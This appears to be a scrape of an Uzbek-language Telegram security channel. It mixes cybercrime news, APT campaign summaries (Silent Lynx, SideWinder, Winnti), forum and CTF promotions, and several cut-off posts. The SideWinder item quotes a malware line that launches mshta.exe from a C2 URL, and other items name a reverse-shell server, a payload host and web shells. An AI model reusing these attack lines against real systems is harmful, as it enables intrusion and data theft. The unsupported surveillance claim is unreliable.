Forum only for hackers!
Xakerlarni bir joyga to'plash vaqti keldi, CentiSec o'z forumini yuritishni boshladi
U yerda soha mutaxassislari bilan muloqot olib borishingiz mumkin faqat axloq bilan.
Yaqin oralarda bu forum-ga faqat pul to'lab kira olishingiz mumkin bo'ladi shunday ekan hozirda u yerda ham sizga joy bor 😎
🔗 Forum LINK: https://t.me/+XfDNbo3_oLZhYTY8
@CentiSec
Xakerlarni bir joyga to'plash vaqti keldi, CentiSec o'z forumini yuritishni boshladi
U yerda soha mutaxassislari bilan muloqot olib borishingiz mumkin faqat axloq bilan.
Yaqin oralarda bu forum-ga faqat pul to'lab kira olishingiz mumkin bo'ladi shunday ekan hozirda u yerda ham sizga joy bor 😎
🔗 Forum LINK: https://t.me/+XfDNbo3_oLZhYTY8
@CentiSec
🔥9❤8 1
Dunyo o‘zgarar ekan, sen ham xabardor bo‘lishing kerak!
O‘rgan, rivojlan, vaqtingni bekorga sarf qilma!
Bug bounty platformalari, eksploitlar va zaifliklarni tahlil qilish bo‘yicha eng foydali postlar shu yerda.
Hujum qilishni o‘rganib, himoyalanishni mustahkamla!
Yakka holda muvaffaqiyat qozonish qiyin, kuchli jamoa esa cheksiz imkoniyatlar yaratadi!
Why waste time? Join the community today!
Please open Telegram to view this post
VIEW IN TELEGRAM
2017-yilda Levashov Ispaniyaning Barselona shahrida AQSh talabi bilan hibsga olingan va keyinchalik AQShga ekstraditsiya qilingan. Sud jarayonidan so‘ng, u 2021-yilda ozodlikka chiqqan.
Gazeta.ru tomonidan olib borilgan surishtiruvga ko‘ra, Levashov ozodlikka chiqqanidan keyin AQSh Federal Tergov Byurosi (FBI) bilan hamkorlik qila boshlagan bo‘lishi mumkin. U "Bratva" taxallusi ostida rusiyzabon kiberjinoyatchilik tarmoqlari haqida ma’lumot to‘plagani taxmin qilinmoqda.
Batafsil:
Why waste time? Join the community today!
Biz shunchaki o'rganuvchilarmiz !!!
@CentiSec
Please open Telegram to view this post
VIEW IN TELEGRAM
"FutureSeeker" guruhi bugun TrumpHotels(.)com tizimini buzganini da'vo qildi. Ular mehmonlarning bron qilish eslatmalari va tasdiqlash xizmatlariga bog‘liq bo‘lgan elektron pochta tizimiga kirish imkoniyatiga ega bo‘lgan. O‘g‘irlangan ma’lumotlar orasida 164,910 ta yozuv mavjud bo‘lib, ularda quyidagilar aks etgan:
Unikal ID (SQL jadvali)
Ism va familiya
Elektron pochta
Yaratilgan sana
Holat va oxirgi yangilanish vaqti
Amal qilish muddati
Ma’lumotlar 2018-yil 18-yanvardan 2025-yil 15-yanvargacha bo‘lgan davrni qamrab oladi. Shunga qaramay, ularda mehmonlarning yashash manzili yoki chiqish sanalari mavjud emas, shuningdek, shaxsiy ma’lumotlar (PII) ham kiritilmagan.
Why waste time? Join the community today!
Biz shunchaki o'rganuvchilarmiz !!!
@CentiSec
Please open Telegram to view this post
VIEW IN TELEGRAM
Seqrite Labs tadqiqotchilari ilgari nomaʼlum boʻlgan "Silent Lynx" guruhi tomonidan Qirgʻiziston va Turkmanistondagi turli tashkilotlarga qaratilgan hujumlarni ochib berdi.
Tadqiqotchilarning taʼkidlashicha, ilgari bu guruh Sharqiy Yevropa va Markaziy Osiyodagi moliyaviy tahlil va iqtisodiy prognozlar bilan bogʻliq tashkilotlarga qaratilgan kampaniyalarda koʻrilgan.Hakerlar guruhining yangi hujumlarining maqsadlari orasida diplomatik muassasalar xodimlari, huquqshunoslar, davlat banklari va tahlil markazlari vakillari bor.Infektsiya RAR arxivi shaklidagi firibgarlik xati orqali boshlanadi, oxir-oqibatda buzilgan hostlarga masofadan kirishni taʼminlaydigan zararli maʼlumotlarni yetkazib beradi.2024-yil 27-dekabrda aniqlangan ikkita kampaniyadan birinchisi ISO faylini ishga tushirish uchun RAR arxividan foydalanadi, bu esa oʻz navbatida zararli C++ binariy fayli va soxta PDF faylini oʻz ichiga oladi.Keyin bajariladigan fayl Telegram botlaridan (south_korea145_bot va south_afr_angl_bot nomlari bilan) buyruqlarni bajarish va maʼlumotlarni olish uchun PowerShell skriptini ishga tushiradi.Botlar orqali bajariladigan baʼzi buyruqlar orasida qoʻshimcha foydali yuklarni masofaviy serverdan (pweobmxdlboi[.]com) yoki Google Diskdan yuklash va saqlash uchun curl buyruqlari mavjud.Boshqa kampaniyada ikkita fayldan iborat zararli RAR arxivi qoʻllaniladi: soxta PDF fayli va boshqariladigan serverga (185.122.171[.]22:8082) teskari shell yaratish uchun moʻljallangan Golang bajariladigan fayli.Seqrite Labs maʼlumotlariga koʻra, Silent Lynx va YoroTrooper (SturgeonPhisher, ilgari Cisco Talos tomonidan ham profilangan) oʻrtasida baʼzi taktikaviy oʻxshashliklar aniqlangan, ular MDH davlatlariga qaratilgan hujumlar bilan bogʻliq.
Telegram botlaridan C2 uchun foydalanish, soxta hujjatlar va mintaqaviy nishonga olish ularning Markaziy Osiyo va SPECA mamlakatlaridagi josuslik faoliyatiga qaratilganligini taʼkidlaydi.
Why waste time? Join the community today!
Biz shunchaki o'rganuvchilarmiz !!!
@CentiSec
Please open Telegram to view this post
VIEW IN TELEGRAM
Hujum quyidagi bosqichlardan iborat:
Why waste time? Join the community today!
Biz shunchaki o'rganuvchilarmiz !!!
@CentiSec
Please open Telegram to view this post
VIEW IN TELEGRAM
https://t.me/boost/CentiSec
Why waste time? Join the community today!
Biz shunchaki o'rganuvchilarmiz !!!
@CentiSec
Please open Telegram to view this post
VIEW IN TELEGRAM
Ushbu 4 kishi faqat 2 erkak va 2 ayol sifatida aniqlangan. Ularning barchasi yevropalik ekani ma’lum. Tailand rasmiylari 40 dan ortiq buyum dalil sifatida musodara qilinganini aytdi. Ularga elektron qurilmalar va raqamli hamyonlar ham kiradi. Shveytsariya ushbu shaxslarning ekstraditsiyasini talab qilgan. Hibsga olinganlar butun dunyo bo‘ylab 16 million dollardan ortiq mablag‘ o‘g‘irlaganlikda gumon qilinmoqda.
Batafsil: https://techcrunch.com/2025/02/10/global-police-operation-seizes-8base-ransomware-gang-leak-site/
Why waste time? Join the community today!
Biz shunchaki o'rganuvchilarmiz !!!
@CentiSec
Please open Telegram to view this post
VIEW IN TELEGRAM
Hakerlar zararli dasturlarni tarqatish uchun:
Bu orqali BACKORDER (loader) ni yangi versiyasi tarqatishmoqda. Oldindan Sandworm bilan bog‘liq bo‘lgan ushbu mehanizm Dark Crystal RAT (DcRAT) zararli dasturini tizimlarga o‘rnatib, hujumchilarga quyidagilarni amalga oshirish imkonini beradi:
Why waste time? Join the community today!
Biz shunchaki o'rganuvchilarmiz !!!
@CentiSec
Please open Telegram to view this post
VIEW IN TELEGRAM
Berilgan vazifani yechib,
CTF tafsilotlari va topshiriq tez orada e’lon qilinadi. Tayyor turing!
Why waste time? Join the community today!
Biz shunchaki o'rganuvchilarmiz !!!
@CentiSec
Please open Telegram to view this post
VIEW IN TELEGRAM
2024-yilning ikkinchi yarmidan boshlab, yangi taktikalar, texnikalar va protseduralar kuzatilmoqda. Jumladan, jabrlanuvchiga PDF hujjati yuborilib, ushbu hujjatda keltirilgan havolaga bosish orqali CVE-2024-38213 zaifligidan foydalanish natijasida tizimga "pdf.lnk" kengaytmali LNK fayli yuklab olinadi. Ushbu fayl ishga tushirilganda, PowerShell buyrug‘ini bajarish orqali qurbonning kompyuteriga zararli hujjat yuklab va ko‘rsatiladi, shuningdek EXE/DLL fayllarni yuklash, ularning doimiyligini ta’minlash (Windows "Run" bo‘limi orqali) va ishga tushirish amalga oshiriladi.
Ma’lumki, ushbu kiber tahdidni amalga oshirishda quyidagi dasturiy vositalar ishlatilgan:
Why waste time? Join the community today!
Biz shunchaki o'rganuvchilarmiz !!!
@CentiSec
Please open Telegram to view this post
VIEW IN TELEGRAM
Please open Telegram to view this post
VIEW IN TELEGRAM
— Proton bergan ma’lumotiga ko’ra, texnik gigantlar, ya’ni Google, Meta va Apple Amerikaning maxsus bo’linmalari va havfsizlik bo’linmalari uchun ma’lumotlar yetkazuvchi sifatida gavdalandi.
Bu shuni anglatadiki Amerika yirik bo’lgan IT gigantlarini kuzatuv uchun foydalanib kelayapti.
Why waste time? Join the community today!
Biz shunchaki o'rganuvchilarmiz !!!
@CentiSec
Please open Telegram to view this post
VIEW IN TELEGRAM
Berilgan vazifani yechib,
CTF tafsilotlari va topshiriq tez orada e’lon qilinadi. Tayyor turing!
Why waste time? Join the community today!
Biz shunchaki o'rganuvchilarmiz !!!
@CentiSec
Please open Telegram to view this post
VIEW IN TELEGRAM
APT guruhi turli sohalarga katta qiziqish uyg'otadi va hujumlarning katta geografiyasi bilan tanishing:
Guruh o'z faoliyatini, ayniqsa Afrikada yanada kengaytirdi. Hujumlar Avstriya, Bangladesh, Kambodja, Jibuti, Misr, Indoneziya, Mozambik, Myanma, Nepal, Pokiston, Filippin, Shri-Lanka, Birlashgan Arab Amirliklari va Vetnamda aniqlangan.
So‘nggi hujumlarda SideWinder Afg‘oniston, Jazoir, Bolgariya, Xitoy, Hindiston, Maldiv orollari, Ruanda, Saudiya Arabistoni, Turkiya va Ugandadagi diplomatik vakolatxonalarni ham nishonga oldi.
Zararli ilovali fishing xabari > RTF ekspluatatsiyasi >
javascript:eval("var gShZVnyR = new ActiveXObject('WScript.Shell');gShZVnyR.Run('mshta.exe)
hxxps://dgtk.depo-govpk[.]com/19263687/trui',0);window.close();")
Ko'rib turganimizdek, mshta ishga tushirildi, u C2 dan hta faylini yuklashi kerak, keyin qonuniy jarayon bilan yuklangan Backdoor Loader kutubxonasi yuklanadi.
Hujum quyidagi nomlarga ega edi:
propsys.dll
vsstrace.dll
JetCfg.dll
Policymanager.dll
winmm.dll
xmllite.dll
dcntele.dll
UxTheme.dll
Bu kutubxona Stealer Bot implantini xotiraga yuklash uchun kerak.
Why waste time? Join the community today!
Biz shunchaki o'rganuvchilarmiz !!!
@CentiSec
Please open Telegram to view this post
VIEW IN TELEGRAM
10 12👍7
— Winnti guruhining Yaponiya tashkilotiga qaratilgan hujum kampaniyasi
WebShell:
- China chopper
- Behinder (Ice Scorpion)
- sqlmap file uploader
Winnti zararli dasturlari (Rootkit, RAT, Loader)
- Dastlabki kirish: "China Chopper" va "Behinder" kabi veb-qobiqlarni joylashtirish uchun Enterprise Resource Planning (ERP) tizimlarida SQL injection zaifliklaridan foydalanish, dastlabki kirish va razvedkani osonlashtiradi.
- Zararli dasturlarni joylashtirish: xavfsizlik mahsulotlarini chetlab o'tish uchun noaniqlik, yangilangan shifrlash algoritmlari va ilg'or qochish usullarini o'z ichiga olgan Winnti zararli dasturining takomillashtirilgan versiyasini o'rnatish.
- Yanal harakat: bir nechta tashkilotlarga ta'sir qiladigan o'zaro bog'langan tarmoqlar bo'ylab zararli dasturlarni tarqatish uchun, xususan, boshqariladigan xizmat ko'rsatuvchi provayderlar (MSP) ichida buzilgan umumiy hisoblardan foydalanish:
Biz shunchaki o'rganuvchilarmiz !!!
@CentiSec
Please open Telegram to view this post
VIEW IN TELEGRAM
Please open Telegram to view this post
VIEW IN TELEGRAM
10 9👍5